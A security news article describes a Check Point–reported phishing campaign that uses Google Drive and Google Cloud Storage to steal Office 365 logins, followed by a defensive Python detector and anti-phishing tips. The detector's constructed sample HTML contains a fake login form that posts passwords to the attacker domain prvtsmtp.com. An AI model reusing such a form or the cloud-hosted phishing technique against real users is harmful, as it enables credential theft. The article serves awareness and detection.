Credential Phishing campaign uses Google Cloud Services to steal Office 365 logins
Threat actors are using cloud services to phish Microsoft Office 365 passwords. Cloud services like Google Drive were used to host a malicious PDF document, while Google’s “storage.googleapis[.]com” hosted the credential phishing page.
This credential phishing scam uses a malicious PDF document that has been uploaded to Google Drive. The PDF file prompts the reader to click on a link to gain access to the document. The “Access Document” link sends the victim to a phishing page hosted on Google Cloud Platform (httpx://storage.googleapis[.]com/asharepoint-unwearied-439052791/index.html). After the page loads, it prompts the reader to log in using one of two options.
The victim is prompted to choose either “Sign in with Office 365” or “Sign in with organization ID”. Regardless of which option is chosen, a window pops up and prompts the reader for their Microsoft Outlook username and password. Cybersecurity researchers at Check Point described this tactic in a report.
After the credentials are entered, the victim’s information is sent to the threat actors and their Microsoft Office account is compromised. To further reduce suspicion, the reader is then redirected to a legitimate PDF report published by a consulting firm.
“During all of these stages, the user never gets suspicious since the phishing page is hosted on Google Cloud Storage. However, viewing the phishing page’s source code has revealed that most of the resources are loaded from a website that belongs to the attackers, prvtsmtp[.]com” says the report.
Threat actors leverage well-known cloud services to increase the success of their scams. Although this phishing campaign uses Google Cloud to host a malicious document, any cloud service could have been used. The goal is to bypass spam email and malware filters and instill trust in the reader. Cloud-based file storage sites like iCloud, Microsoft Azure, and Dropbox can all be used by threat actors in this type of cyberattack.
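The Check Point observation above (resources loaded from prvtsmtp[.]com) is something a defender can check for mechanically. The following is an added example, not code from Check Point or this article: it parses a page’s HTML, resolves where its scripts, stylesheets, images and form targets point, and flags a page whose password form submits to a host other than the one serving it. The sample HTML is constructed for illustration; only the bucket path and the attacker domain come from the report.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: a login page on Google Cloud Storage (the bucket path is the
# one quoted in the article, with a real scheme instead of the defanged "httpx")
# that loads its resources from and posts credentials to prvtsmtp[.]com.
PAGE_URL = "https://storage.googleapis.com/asharepoint-unwearied-439052791/index.html"
SAMPLE_HTML = """<html><head>
<link rel="stylesheet" href="https://prvtsmtp.com/css/office.css">
<script src="https://prvtsmtp.com/js/login.js"></script>
<script src="/asharepoint-unwearied-439052791/app.js"></script>
</head><body>
<img src="https://prvtsmtp.com/img/logo.png">
<form action="https://prvtsmtp.com/post.php" method="post"><input type="password" name="pass"></form>
</body></html>"""

class OriginCollector(HTMLParser):
    # Tag -> attribute that names the resource or form target to resolve.
    ATTRS = {"script": "src", "link": "href", "img": "src", "iframe": "src", "form": "action"}

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.resources = []      # absolute URLs of loaded resources
        self.form_targets = []   # absolute URLs that forms submit to
        self.has_password = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "input" and (attrs.get("type") or "").lower() == "password":
            self.has_password = True
        key = self.ATTRS.get(tag)
        if key and attrs.get(key):
            url = urljoin(self.base_url, attrs[key])  # resolve relative references
            (self.form_targets if tag == "form" else self.resources).append(url)

def foreign_hosts(urls, host):
    """Hosts among urls that differ from the host serving the page."""
    return sorted({urlsplit(u).hostname for u in urls if urlsplit(u).hostname != host})

def analyze(html, page_url):
    """Report where a page's resources and credential forms point to."""
    parser = OriginCollector(page_url)
    parser.feed(html)
    host = urlsplit(page_url).hostname
    offsite_forms = foreign_hosts(parser.form_targets, host)
    return {"host": host, "third_party_hosts": foreign_hosts(parser.resources, host),
            "offsite_form_hosts": offsite_forms, "collects_password": parser.has_password,
            # A password field posting off the hosting domain is the pattern described.
            "suspicious": parser.has_password and bool(offsite_forms)}
```

Run against the sample, the page is reported as hosted on storage.googleapis.com but loading from and posting to prvtsmtp.com, which is exactly the mismatch the report describes.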
How to protect against phishing
- Always scrutinize the sender of any email, even if they seem familiar. Threat actors use domain names that closely resemble those of legitimate, well-known companies and services. Often the sender’s email address is off by only one letter.
- Be sure to use a unique password for each online account you have. A password vault can help you remember them. Attackers can gain access to a low-level account (social media) and then use that password to hack their way into more valuable accounts like bank accounts and credit cards.
- Use an antivirus program to scan emails and alert you to suspicious senders, links, websites, and email attachments.
- Be highly suspicious of any email that prompts you to act immediately, even if it’s from a service you do business with. Threat actors brand emails to look just like those of well-known global companies like Chase Bank and Microsoft Office to trick readers into following links in the scams.
- Think before you act. Threat actors craft the wording in a phishing email in hopes that the reader acts without thinking or scrutinizing the email and the links it contains. Take a minute to look carefully at the contents of all emails before you respond.
- Be wary of any links in emails, especially if they’re asking you to reset a password or go to a website to avoid some sort of negative action. Often the links in phishing emails are cloaked or shortened to disguise the identity of the website they lead to.
- Be suspicious of any email that contains an attachment that you were not expecting – even if the email appears to come from somebody you think you know. Call them and verify that they sent you an email with attachments before opening or downloading. Documents attached to emails can contain malware or links to malicious websites.